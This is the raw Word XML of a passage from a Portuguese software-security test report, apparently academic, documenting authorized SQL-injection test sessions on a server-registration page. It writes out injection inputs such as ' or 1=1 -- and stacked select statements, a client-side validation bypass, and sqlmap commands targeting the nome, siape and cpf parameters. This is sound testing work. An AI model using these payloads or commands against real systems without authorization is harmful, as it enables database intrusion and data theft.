          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>]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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6FE529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8B7343C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75B8935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DABA4ED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CE2D684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54C4531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A074E55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29920" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CDF2FDA" wp14:editId="593BA093">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>243840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-970280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 23 – Navegador Firefox impede a conexão quando o filtro de CORS é utilizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554CB26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1025A74" w14:textId="3F2FA0C0" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5F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4.3.5.2 Tela Cadastro Servidor – Exploração via SQL </w:t>
      </w:r>
      <w:proofErr w:type="spell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  <w:r w:rsidR="00E804ED"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 e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E804ED" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SqlMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4254F25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FE1405B" w14:textId="6E3D45FD" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="005178AE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Tarefa realizada dia 25</w:t>
      </w:r>
      <w:r w:rsidR="006F4C5F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EB39C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: 1 hora e 30 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED2544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8BB6105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14:paraId="0785C2F4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Submeter entradas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maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor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. Então executar sessões de testes para forçar ações não autorizadas no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3194BEB8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9790052" w14:textId="77777777" w:rsidR="00F86B59" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59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20E2F04" w14:textId="77777777" w:rsidR="00F86B59" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59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2655589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14:paraId="748F478D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7B8E3CF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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” é vulnerável a injeção de código SQL utilizando a técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B085224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9441608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Entrada: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teste ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DFA69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74C6F41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1A54D3AD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o sistema realize o tratamento do caractere aspa simples como um parâmetro regular da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43495D21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0868730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73FD3239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. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537CA33A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F8EBEE9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23EDE7D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14:paraId="50EA4656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69944C8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Inserir um texto com uma distribuição adequada de aspa simples e comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline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como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários cadastrados. Comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, como “#” e “--” serão utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F089F2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6E8C1DD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Entradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61F08F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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste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‘ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5688E9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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste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‘ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF2477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9B6D08F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656BC3EE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Espera-se que o sistema realize o tratamento dos caracteres para impedir que os comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline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modifiquem a instrução de consulta utilizada pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248745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0A37F7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7B5D3CCF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O sistema passou nos testes. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2CFD4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81BD0F4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E2C11C8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3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5BB30A49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E9E6A2F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É possível que a tela utilize </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, o funcionamento do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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foi desabilitado no browser utilizado para testes. Após isso, foram repetidos os procedimentos das Sessões de testes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1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e 2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C7AD9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CE18E5A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Entradas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F036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D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1CDFF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D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ or 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD89218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D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269701E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1FF2117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43A5424D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Espera-se que o sistema realize o tratamento de todos os caracteres informados como parâmetros regulares da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED60BC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EA4E130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465FE6EC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Cs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nada aconteceu. Com o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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desabilitado no navegador a página não realizou nenhuma requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AC892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4D41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5D64E7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5F4BFEB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Com a função de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções SQL no campo “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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09737796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DBF6779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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entradas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1465B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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1231 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D24C9C8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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">); select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DC464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343F5C9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71390878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3406C560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Espera-se que o sistema realize o tratamento de todos os caracteres informados como parâmetros regulares da consulta. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CECF5E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2F5F44E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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA4628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O sistema passou nos testes. Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao campo “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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Entretanto, devido à falta de tratamento adequado para dados inválidos no campo “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” o seguinte erro foi exibido: </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘id’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D418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b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dessa forma foi possível identificar que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5233A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F93DC8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softHyphen/>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F87CD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 xml:space="preserve">Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="358980D7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72088E0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Usar a ferramenta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para realizar testes para injetar SQL na página.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FF23C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Para realizar essa sessão de teste, foi necessário utilizar a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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para capturar as informações de cookie contidas no cabeçalho HTTP da requisição no momento em que a página de Cadastro Servidor é </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">acessada. A Figura 24 mostra os dados obtidos através do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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. Esses dados foram salvos no arquivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor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para ser utilizado na execução do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686CC12F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F3C1CAA" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C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30944" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F8C1432" wp14:editId="1BEFB87A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>62865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>198120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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88" y="21360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27(Editada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4718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Figura 24 – Dados da requisição </w:t>
      </w:r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pagina Cadastro Servidor capturada pelo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01237A92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921ED8F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5A35B78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4D4181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</w:p>
    <w:p w14:paraId="56F8EBB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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor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-p nome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26771B74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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor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-p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4264FA6C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4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor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-p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36E7CD70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5C1111C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ABA4DB2" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5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28435625" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaCadastroServidor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3A4C90EC" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5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p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26609284" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5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“--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current-db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” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E19131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58BEA55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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A97714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1749F696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o sistema realize o tratamento dos parâmetros “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, ”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” e “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf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>” e não permita a injeção de SQL nesses campos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B859470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E9C4C27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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D22483C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O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
